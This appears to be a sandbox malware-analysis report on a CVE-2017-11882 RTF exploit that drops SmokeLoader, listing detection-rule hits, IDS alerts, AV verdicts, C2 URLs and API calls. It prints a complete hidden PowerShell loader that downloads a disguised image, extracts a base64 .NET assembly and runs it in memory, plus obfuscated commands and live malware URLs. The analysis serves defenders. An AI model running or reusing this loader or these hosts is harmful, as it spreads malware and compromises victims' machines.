            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = 
[System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8
            Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3312, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , ProcessId: 3472, ProcessName: wscript.exe
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3312, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? 
?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
            Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3260, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
            Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3516, TargetFilename: C:\Users\user\AppData\Local\Temp\zoonpc2e.0er.ps1

            Data Obfuscation

            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = 
$loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8
            Timestamp                        SID      Severity  Src Port  Dst Port  Proto  Classtype
            2024-08-31T19:25:08.839977+0200  2049038  1         443       49164     TCP    A Network Trojan was detected
            2024-08-31T19:25:33.084582+0200  2039103  1         49166     80        TCP    A Network Trojan was detected
            2024-08-31T19:25:33.477519+0200  2829848  2         80        49166     TCP    Potentially Bad Traffic
            2024-08-31T19:25:41.127631+0200  2039103  1         49167     80        TCP    A Network Trojan was detected
            2024-08-31T19:26:53.834308+0200  2039103  1         49168     80        TCP    A Network Trojan was detected

            AV Detection

            Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf | Avira: detected
            Source: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg | URL Reputation: Label: malware
            Source: http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIF | Avira URL Cloud: Label: malware
            Source: http://prolinice.ga/index.php | Avira URL Cloud: Label: malware
            Source: http://vilendar.ga/index.php | Avira URL Cloud: Label: malware
            Source: 0000000A.00000002.376068215.00000000000A0000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
            Source: prolinice.ga | Virustotal: Detection: 15%
            Source: http://prolinice.ga/ | Virustotal: Detection: 15%
            Source: http://prolinice.ga/index.php | Virustotal: Detection: 18%
            Source: http://vilendar.ga/index.php | Virustotal: Detection: 16%
            Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf | Virustotal: Detection: 50%
            Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf | ReversingLabs: Detection: 50%
            Source: C:\Windows\explorer.exe | Code function: 12_2_02805174 CryptAcquireContextA,12_2_02805174
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C3098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,19_2_000C3098
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C3717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,19_2_000C3717
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C3E04 RtlCompareMemory,CryptUnprotectData,19_2_000C3E04
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C1198 CryptBinaryToStringA,CryptBinaryToStringA,19_2_000C1198
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C11E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,19_2_000C11E1
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,19_2_000C123B
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C1FCE CryptUnprotectData,RtlMoveMemory,19_2_000C1FCE
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 21_2_000826AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,21_2_000826AC
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 22_2_0008178C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,22_2_0008178C
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 22_2_0008118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,22_2_0008118D
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_000C2404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,24_2_000C2404
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_000C245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,24_2_000C245E
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_000C263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,24_2_000C263E
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 26_2_00082799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,26_2_00082799
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 26_2_000825A4 CryptBinaryToStringA,CryptBinaryToStringA,26_2_000825A4

            Exploits

            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 23.94.148.16 Port: 80
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: unknown | HTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49164 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: gwseuha, 00000011.00000000.414661031.00000000013A2000.00000020.00000001.01000000.00000008.sdmp, gwseuha.12.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: RegAsm.pdb4 source: gwseuha, 00000011.00000000.414661031.00000000013A2000.00000020.00000001.01000000.00000008.sdmp, gwseuha.12.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
